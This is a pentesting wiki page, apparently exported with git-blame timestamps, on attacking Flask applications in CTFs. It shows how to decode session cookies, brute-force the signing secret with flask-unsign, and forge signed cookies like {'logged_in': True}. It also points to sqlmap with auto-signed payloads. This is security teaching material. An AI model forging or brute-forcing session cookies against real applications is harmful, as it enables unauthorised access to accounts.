2020-07-15 15:43:14 +00:00
# Flask
2021-11-30 16:46:07 +00:00
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI** ](../../pentesting-web/ssti-server-side-template-injection/ )**.**
2020-07-15 15:43:14 +00:00
## Cookies
2020-11-22 23:24:53 +00:00
Default cookie session name is ** `session` **.
2020-07-15 15:43:14 +00:00
### Decoder
Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi ](https://www.kirsle.net/wizards/flask-session.cgi )
#### Manual
2021-10-18 11:21:18 +00:00
Get the first part of the cookie until the first point and Base64 decode it>
2020-07-15 15:43:14 +00:00
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
echo "ImhlbGxvIg" | base64 -d
```
The cookie is also signed using a password
2021-11-30 16:46:07 +00:00
###  **Flask-Unsign**
2020-07-15 15:43:14 +00:00
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
{% embed url="https://pypi.org/project/flask-unsign/" %}
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
pip3 install flask-unsign
```
#### **Decode Cookie**
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```
#### **Brute Force**
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --unsign --cookie < cookie.txt
```
#### **Signing**
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
2021-10-18 11:21:18 +00:00
#### Signing using legacy (old versions)
2020-07-15 15:43:14 +00:00
2020-11-22 21:41:06 +00:00
```bash
2020-07-15 15:43:14 +00:00
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
2021-06-25 15:27:40 +00:00
### SQLi in Flask session cookie with SQLmap
2022-01-31 14:51:03 +00:00
[**This example** ](../../pentesting-web/sql-injection/sqlmap/#eval ) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret.